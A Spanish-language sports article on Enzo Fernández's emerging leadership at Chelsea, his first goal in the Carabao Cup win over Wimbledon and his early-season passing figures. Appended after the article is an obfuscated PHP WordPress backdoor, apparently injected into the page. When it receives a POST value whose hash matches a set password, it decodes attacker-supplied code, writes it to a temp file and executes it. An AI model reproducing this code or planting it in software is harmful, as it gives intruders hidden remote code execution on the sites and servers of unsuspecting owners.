Enzo, capitán sin brazalete

El primer gol del argentino con la camiseta del Chelsea permitió a los de Mauricio Pochettino clasificarse para la 3ª ronda de Carabao Cup. En apenas cuatro partidos se ha destapado como el gran líder del nuevo proyecto ‘blue’.

Para la 2023-2024, el Chelsea concedió la capitanía a Reece James. La lesión del lateral inglés en la primera jornada llevó a que su compatriota Ben Chilwell cogiera el testigo del brazalete. Otras figuras destacadas del vestuario como Thiago Silva o Cono Gallagher también lo han portado en los primeros partidos del curso pero, en lo que a términos futbolísticos se refiere, el Chelsea de Mauricio Pochettino tiene un líder indiscutible, y no es otro que Enzo Fernández.

El campeón del mundo llegó a Stamford Bridge por una cifra récord de 121 millones de euros con el objetivo de hacer historia con los blues, y tras una primera media temporada de sinsabores, en la que el Chelsea se quedó fuera de competiciones europeas, Enzo Fernández ha dado ya los primeros pasos en la presente campaña para erigirse en el líder, tanto futbolístico como anímico, que tanto ansían en el oeste de Londres.

Un deseo de triunfar como blue que evidenció el nuevo entrenador del Chelsea en la previa de la temporada: “Enzo está demostrando que tiene un buen compromiso con el club y el equipo. Se está entrenando muy bien. Creo que sólo van a pasar cosas buenas con él, porque está muy comprometido con este club”.

Mauricio Pochettino dejó al centrocampista argentino en el banquillo para la 2ª ronda de la Carabao Cup ante el Wimbledon, y este necesitó menos de media hora para convertirse nuevamente en el protagonista del encuentro y salvar a los suyos de caer eliminados ante un equipo de League Two. Enzo Fernández no solo marcó el definitivo 2-1 de los blues a los siete minutos de saltar al terreno de juego, sino que tan solo el arquero visitante Alex Bass privó al argentino de llevarse el balón a casa.

El gol que permitió al equipo de Stamford Bridge avanzar hasta la 3ª ronda de la Copa de la Liga fue el primero de Enzo Fernández con la camiseta del Chelsea, ya que el argentino terminó la 2022-2023 con dos asistencias en su haber pero ningún tanto, más allá de los cuatro goles y seis asistencias que registró con el Benfica.

Una actuación, la del ‘8′ del Chelsea ante el Wimbledon, que sigue la línea de las ya realizadas en el campeonato liguero. Enzo Fernández estrenó la Premier League 2023-2024 ante el Liverpool con una masterclass desde la sala de máquinas. El argentino fue el director de orquesta blue, generando el juego del Chelsea en la base y las ocasiones más peligrosas de los suyos, así como pisando el área rival. Y es que, en apenas tres partidos de liga, Enzo Fernández suma ocho pases clave, más de un 90% de acierto en pases y dos disparos al palo.

Así mismo, tal y como registra Optael futbolista blue de 22 años es el jugador que ha completado más pases (36) en el tercio ofensivo y más pases largos (22) en la Premier League en lo que va de temporada. Mientras Enzo Fernández espera vestir el brazalete de capitán del Chelsea más pronto que tarde, en Stamford Bridge ya tienen a su proyecto de ídolo.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}